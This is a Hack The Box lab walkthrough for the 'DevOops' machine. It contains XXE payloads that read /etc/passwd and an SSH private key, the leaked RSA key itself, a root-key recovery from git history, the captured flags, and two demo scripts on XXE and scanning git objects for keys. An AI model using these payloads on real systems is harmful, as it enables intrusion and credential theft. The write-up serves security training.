[HTB Notes] Dev0ops

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.91
# 22/tcp   open  ssh
# 5000/tcp open  upnp
#
nmap -oN dev0ops.nmap -p22,5000 -sC -sV -v 10.10.10.91
# 22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey:
# |   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
# |   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
# |_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
# 5000/tcp open  http    Gunicorn 19.7.1
# | http-methods:
# |_  Supported Methods: HEAD OPTIONS GET
# |_http-server-header: gunicorn/19.7.1
# |_http-title: Site doesn't have a title (text/html; charset=utf-8).
# Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Explore the HTTP service on port 5000
[x] Run gobuster
gobuster -u http://10.10.10.91:5000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
# (gobuster 3.x moved this into a subcommand: gobuster dir -u ... -w ...)
# /feed (Status: 200)
# /upload (Status: 200)
[x] Successfully upload a working XML file
# something.xml
  <Something>
      <Author>someone</Author>
      <Subject>something</Subject>
      <Content>something</Content>
  </Something>
# PROCESSED BLOGPOST: Author: someone Subject: something Content: something
# URL for later reference: /uploads/something.xml
# File path: /home/roosa/deploy/src
[x] Check for XXE (XML External Entities) vulnerability
# xxe_test.xml
  <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >   
  ]>
  <Something>
      <Author>someone</Author>
      <Subject>something</Subject>
      <Content>&xxe;</Content>
  </Something>
# git:x:1001:1001:git,,,:/home/git:/bin/bash 
# roosa:x:1002:1002:,,,:/home/roosa:/bin/bash
[x] Use the same XXE to read roosa's SSH private key (a file read through the entity resolver; often labelled LFI, but nothing is "included" by the app)
# xxe_lfi.xml
  <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa" >   
  ]>
  <Something>
      <Author>someone</Author>
      <Subject>something</Subject>
      <Content>&xxe;</Content>
  </Something>
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAuMMt4qh/ib86xJBLmzePl6/5ZRNJkUj/Xuv1+d6nccTffb/7
9sIXha2h4a4fp18F53jdx3PqEO7HAXlszAlBvGdg63i+LxWmu8p5BrTmEPl+cQ4J
R/R+exNggHuqsp8rrcHq96lbXtORy8SOliUjfspPsWfY7JbktKyaQK0JunR25jVk
v5YhGVeyaTNmSNPTlpZCVGVAp1RotWdc/0ex7qznq45wLb2tZFGE0xmYTeXgoaX4
9QIQQnoi6DP3+7ErQSd6QGTq5mCvszpnTUsmwFj5JRdhjGszt0zBGllsVn99O90K
m3pN8SN1yWCTal6FLUiuxXg99YSV0tEl0rfSUwIDAQABAoIBAB6rj69jZyB3lQrS
JSrT80sr1At6QykR5ApewwtCcatKEgtu1iWlHIB9TTUIUYrYFEPTZYVZcY50BKbz
ACNyme3rf0Q3W+K3BmF//80kNFi3Ac1EljfSlzhZBBjv7msOTxLd8OJBw8AfAMHB
lCXKbnT6onYBlhnYBokTadu4nbfMm0ddJo5y32NaskFTAdAG882WkK5V5iszsE/3
koarlmzP1M0KPyaVrID3vgAvuJo3P6ynOoXlmn/oncZZdtwmhEjC23XALItW+lh7
e7ZKcMoH4J2W8OsbRXVF9YLSZz/AgHFI5XWp7V0Fyh2hp7UMe4dY0e1WKQn0wRKe
8oa9wQkCgYEA2tpna+vm3yIwu4ee12x2GhU7lsw58dcXXfn3pGLW7vQr5XcSVoqJ
Lk6u5T6VpcQTBCuM9+voiWDX0FUWE97obj8TYwL2vu2wk3ZJn00U83YQ4p9+tno6
NipeFs5ggIBQDU1k1nrBY10TpuyDgZL+2vxpfz1SdaHgHFgZDWjaEtUCgYEA2B93
hNNeXCaXAeS6NJHAxeTKOhapqRoJbNHjZAhsmCRENk6UhXyYCGxX40g7i7T15vt0
ESzdXu+uAG0/s3VNEdU5VggLu3RzpD1ePt03eBvimsgnciWlw6xuZlG3UEQJW8sk
A3+XsGjUpXv9TMt8XBf3muESRBmeVQUnp7RiVIcCgYBo9BZm7hGg7l+af1aQjuYw
agBSuAwNy43cNpUpU3Ep1RT8DVdRA0z4VSmQrKvNfDN2a4BGIO86eqPkt/lHfD3R
KRSeBfzY4VotzatO5wNmIjfExqJY1lL2SOkoXL5wwZgiWPxD00jM4wUapxAF4r2v
vR7Gs1zJJuE4FpOlF6SFJQKBgHbHBHa5e9iFVOSzgiq2GA4qqYG3RtMq/hcSWzh0
8MnE1MBL+5BJY3ztnnfJEQC9GZAyjh2KXLd6XlTZtfK4+vxcBUDk9x206IFRQOSn
y351RNrwOc2gJzQdJieRrX+thL8wK8DIdON9GbFBLXrxMo2ilnBGVjWbJstvI9Yl
aw0tAoGAGkndihmC5PayKdR1PYhdlVIsfEaDIgemK3/XxvnaUUcuWi2RhX3AlowG
xgQt1LOdApYoosALYta1JPen+65V02Fy5NgtoijLzvmNSz+rpRHGK6E8u3ihmmaq
82W3d4vCUPkKnrgG8F7s3GL6cqWcbZBd0j9u88fUWfPxfRaQU3s=
-----END RSA PRIVATE KEY-----
[x] Save private key as ssh_roosa.key
chmod 400 ssh_roosa.key
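The read above works because the server-side parser is allowed to fetch SYSTEM entities. The script below is an added example (not the DevOops application's code) that reproduces the effect offline: it writes a constructed stand-in for id_rsa to a temp file, builds the same DOCTYPE/entity layout as xxe_lfi.xml against that file, and feeds the payload to the stdlib SAX parser with external general entities switched on (the unsafe setting) and to ElementTree, which never resolves external entities. The SECRET value, the temp file and the _Collector handler are constructed for the demo.

```python
import io
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
from pathlib import Path
from typing import Optional
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the contents of /home/roosa/.ssh/id_rsa.
SECRET = "CONSTRUCTED-SECRET-not-a-real-key"


def make_secret_file() -> Path:
    """Write a throwaway file that plays the role of the target file."""
    f = tempfile.NamedTemporaryFile("w", suffix=".key", delete=False)
    f.write(SECRET + "\n")
    f.close()
    return Path(f.name)


def xxe_payload(target: Path) -> str:
    """Same DOCTYPE/entity layout as xxe_lfi.xml, aimed at an arbitrary file."""
    return (
        "<!DOCTYPE foo [\n"
        "  <!ELEMENT foo ANY >\n"
        f'  <!ENTITY xxe SYSTEM "{target.as_uri()}" >\n'
        "]>\n"
        "<Something>\n"
        "  <Author>someone</Author>\n"
        "  <Subject>something</Subject>\n"
        "  <Content>&xxe;</Content>\n"
        "</Something>\n"
    )


class _Collector(ContentHandler):
    """Gathers the text of each element, like the blog-post processor does."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        # Text from an expanded external entity arrives here as well.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_vulnerable(payload: str) -> dict:
    """xml.sax with external general entities enabled: SYSTEM entities get fetched."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # the unsafe switch
    handler = _Collector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload.encode()))
    return {name: text.strip() for name, text in handler.fields.items()}


def parse_hardened(payload: str) -> Optional[dict]:
    """ElementTree never fetches external entities; the reference is rejected."""
    try:
        root = ET.fromstring(payload)
    except ET.ParseError:
        return None
    return {child.tag: (child.text or "").strip() for child in root}


def demo():
    """Run both parsers on the same payload; returns (leaked, blocked)."""
    target = make_secret_file()
    try:
        payload = xxe_payload(target)
        return parse_vulnerable(payload), parse_hardened(payload)
    finally:
        target.unlink()


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable parser:", leaked)
    print("hardened parser:  ", blocked)
```

The vulnerable path returns the file contents in the Content field exactly as the box echoed them back in "PROCESSED BLOGPOST"; the hardened path refuses the reference. The same limitation applies as on the box: the fetched file is spliced in as XML text, so a file containing `<` or `&` breaks the parse (a CDATA or parameter-entity wrapper is the usual workaround).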

3. Get a shell as user roosa
ssh -i ssh_roosa.key -l roosa 10.10.10.91
# roosa@gitter:~$
[x] While inside shell:
find / -name user.txt 2> /dev/null
# /home/roosa/user.txt
#
cat /home/roosa/user.txt
# c5808e1643e801d40f09ed87cdecc67b

4. Attempt Privilege Escalation (roosa -> root)
[x] Navigate to ~/work
cd ~/work
ls -la
# drwxrwx--- 5 roosa roosa 4096 Oct 14 12:06 blogfeed
#
ls -la blogfeed
# drwxrwx--- 8 roosa roosa 4096 Mar 26  2018 .git
[x] Explore .git directory
cd ~/work/blogfeed/.git
cat logs/HEAD
# [-] d387abf63e05c9628a59195cec9311751bdb283f 
# [*] commit: add key for feed integration from tnerprise backend
#
# [-] 33e87c312c08735a02fa9c796021a4a3023129ad
# [*] commit: reverted accidental commit with proper key
#
git cat-file -p d387abf63e05c9628a59195cec9311751bdb283f
# [-] tree -> f34d3c1444928c71b04a230ffdca810ac3846eb0
#
git cat-file -p f34d3c1444928c71b04a230ffdca810ac3846eb0
# [-] tree -> e14586d1a0f07cd37e1793a07b63339b9fc5f95e
#
git cat-file -p e14586d1a0f07cd37e1793a07b63339b9fc5f95e
# [-] tree -> 30aad4b269eb0012f1b5f4f13919bc68deac70a2
#
git cat-file -p 30aad4b269eb0012f1b5f4f13919bc68deac70a2
# [-] blob -> 44c981f1e321f48a127adb6a40b0e05545cc32a8
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

# Object map of the repository's commits (tree and blob hashes per commit).
# Each hash is written as <2-char dir> <38-char file>, the way git stores loose objects under .git/objects/.
[1] 14 22e5a04d1b52a44e6dc81023420347e257ee5f		Initial commit
     
	TREE 	: 28 663660daa527d277c0a82774fbfdabb0abad3f
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]

[2] d3 87abf63e05c9628a59195cec9311751bdb283f		add key for feed integration from tnerprise backend
     
	TREE	: f3 4d3c1444928c71b04a230ffdca810ac3846eb0
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: e1 4586d1a0f07cd37e1793a07b63339b9fc5f95e [resources]
	--tree 	: 30 aad4b269eb0012f1b5f4f13919bc68deac70a2 [integration]
	----blob: 44 c981f1e321f48a127adb6a40b0e05545cc32a8 [authcredentials.key]

[3] 33 e87c312c08735a02fa9c796021a4a3023129ad		reverted accidental commit with proper key
     
	TREE	: c2 5f135513a4db4e2f87418e7bf1107cd7c25371
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	--tree 	: f9 00a57d3ff4ea618feca15263b83be8dc3d584d [integration]
	----blob: f4 bde49fc24d1fd47a05c4b0d50b70366f4e9c56 [authcredentials.key]

[4] df ebfdfd9146c98432d19e3f7d83cc5f3adbfe94		Gunicorn startup script
     
	TREE	: 51 ecfea82c6979665cde44c3d3635839d792e3fd
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 79936f6497aa995421a55cc2ba99b8e8fb0097 [run-gunicorn.sh]

[5] ca 3e768f2434511e75bd5137593895bd38e1b1c2		Blogfeed app, initial version.

	TREE	: 67 4d6cec88527a58636009b4cc2af226b656460a
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 79936f6497aa995421a55cc2ba99b8e8fb0097 [run-gunicorn.sh]
	tree 	: 9c 8c24eaf6ad15864c76278009d35da1a139d322 [src]
	--blob 	: 81 9aa9ac0cb6bc12029206bdfbb7bca97bc69d9b [feed.py]
	--blob 	: 12 43ddacbe89c344e1074c094ce34eae7de1a463 [index.html]
	--blob 	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[6] ce c54d8cb6117fd7f164db142f0348a74d3e9a70		Debug support added to make development more agile.
     
	TREE 	: 12 65450ddc99e8d15b724df9c14fcf94fab3e4f5
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 79936f6497aa995421a55cc2ba99b8e8fb0097 [run-gunicorn.sh]
	tree 	: 15 661d8b2cd141c488c488a85d11f62143cb12b2 [src]
	--blob	: 09 2df11679f54b8a63c67ee809098137a8862cdc [feed.py]
	--blob 	: 12 43ddacbe89c344e1074c094ce34eae7de1a463 [index.html]
	--blob 	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[7] 26 ae6c8668995b2f09bf9e2809c36b156207bfa8		Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use.
	TREE	: c9 6ca250c890f1e62cc7c38d6700ee7fab8d66dc
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 f8fb3d48674b59186868e145b45be7c6bbafcf [run-gunicorn.sh]
	tree 	: 34 9920466cd0d9651ddb9f04d6d2ff554403a60f [src]
	--blob 	: 6d e2b19ed2bbba93cdabaf3b8bedd98ddabfd993 [feed.py]
	--blob 	: 12 43ddacbe89c344e1074c094ce34eae7de1a463 [index.html]
	--blob 	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[8] 7f f507d029021b0915235ff91e6a74ba33009c6d		Use Base64 for pickle feed loading

	TREE	: 17 5743e03c7472fe9ede3d37e6eab7b35a88fbd8
	blob 	: fe 0a1d021a0dacc771ac785c399071876e5a6ae1 [README.md]
	tree 	: 32 93fdb4a599c0d05e0b13af035a7c8024376e80 [resources]
	blob 	: 07 f8fb3d48674b59186868e145b45be7c6bbafcf [run-gunicorn.sh]
	tree 	: 70 27688693a2b0ca9fb1b80dd00ec193c5da0a29 [src]
	--blob 	: 81 e7ce0773f92d2dc343de62d259429d39b3674f [feed.py]
	--blob	: b5 244f5eba4bee25f44039fc1afb41d1a5d6aaf3 [index.html]
	--blob	: 63 0385e58a1be801492795aba3057bc86495d590 [upload.html]

[9] d3 87abf63e05c9628a59195cec9311751bdb283f (8->2)
     (tree == f3 4d3c1444928c71b04a230ffdca810ac3846eb0)
[x] Extract private key and save as ssh_root.key
chmod 400 ssh_root.key
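The map above is the hard way of saying one thing: the "reverted accidental commit" only added a new commit, the blob from the accidental one is still in the object store. The script below is an added example (not part of the notes or of the blogfeed repository) that builds a throwaway .git/objects tree containing a constructed placeholder key, then finds it by inflating every loose object and looking for a private-key marker, ignoring refs and commits entirely. It needs no git binary on the target; the FAKE_KEY text, the tree entry and the MARKERS tuple are constructed for the demo.

```python
import hashlib
import tempfile
import zlib
from pathlib import Path

# Constructed stand-in for resources/integration/authcredentials.key.
FAKE_KEY = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
    "-----END RSA PRIVATE KEY-----\n"
)
# Substrings that mark PEM / OpenSSH private keys inside a blob.
MARKERS = (b"PRIVATE KEY-----",)


def hash_object(kind: str, payload: bytes) -> str:
    """Object name = SHA-1 over '<kind> <size>\\0<payload>', as git computes it."""
    return hashlib.sha1(f"{kind} {len(payload)}\0".encode() + payload).hexdigest()


def object_path(objects_dir: Path, sha: str) -> Path:
    """Loose object <sha> lives at objects/<first 2 hex>/<remaining 38 hex>."""
    return objects_dir / sha[:2] / sha[2:]


def write_loose_object(objects_dir: Path, kind: str, payload: bytes) -> str:
    """Store an object exactly as git does (zlib-compressed header + payload)."""
    raw = f"{kind} {len(payload)}\0".encode() + payload
    sha = hash_object(kind, payload)
    path = object_path(objects_dir, sha)
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))
    return sha


def read_loose_object(path: Path):
    """Inflate a loose object and split off its '<kind> <size>\\0' header."""
    raw = zlib.decompress(path.read_bytes())
    header, _, payload = raw.partition(b"\0")
    kind, size = header.decode().split(" ")
    if int(size) != len(payload):
        raise ValueError(f"corrupt object: {path}")
    return kind, payload


def scan_loose_blobs(objects_dir: Path, markers=MARKERS) -> dict:
    """Return {sha: payload} for every loose blob that contains a marker.

    Refs and commits are ignored on purpose: a revert adds a commit, it does
    not delete the blob the accidental commit introduced (until gc/prune).
    """
    hits = {}
    for subdir in sorted(objects_dir.iterdir()):
        if not (subdir.is_dir() and len(subdir.name) == 2):
            continue  # info/ and pack/; packed objects need git cat-file
        for obj in subdir.iterdir():
            kind, payload = read_loose_object(obj)
            if kind == "blob" and any(m in payload for m in markers):
                hits[subdir.name + obj.name] = payload
    return hits


def demo():
    """Build a small object store, then recover the key without using refs."""
    with tempfile.TemporaryDirectory() as tmp:
        objects = Path(tmp) / ".git" / "objects"
        write_loose_object(objects, "blob", b"# blogfeed\n")  # README.md
        key_sha = write_loose_object(objects, "blob", FAKE_KEY.encode())
        # A tree entry pointing at the key blob: mode, name, NUL, raw 20-byte sha.
        write_loose_object(objects, "tree", b"100644 authcredentials.key\0" + bytes.fromhex(key_sha))
        hits = scan_loose_blobs(objects)
    return key_sha, {sha: payload.decode() for sha, payload in hits.items()}


if __name__ == "__main__":
    key_sha, hits = demo()
    for sha, text in hits.items():
        print(f"{sha[:2]} {sha[2:]}")  # same dir/file split as the map in these notes
        print(text)
```

On the box itself the blob name is already known from the walk (44c981f1e321f48a127adb6a40b0e05545cc32a8), so `git cat-file -p` on it, or `git show d387abf63e05c9628a59195cec9311751bdb283f:resources/integration/authcredentials.key`, prints the key directly; the scanner is for the case where you do not know which commit or path to look at. It only covers loose objects: once a repository has been repacked, enumerate with `git cat-file --batch-all-objects --batch-check` and read the blobs with `git cat-file -p` instead.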
[x] Get a shell as root (ssh defaults to the local username, so pass -l root)
ssh -i ssh_root.key -l root 10.10.10.91
# root@gitter:~#
[x] While inside shell:
find / -name "root.txt"
# /root/root.txt
#
cat /root/root.txt
# d4fe1e7f7187407eebdd3209cb1ac7b3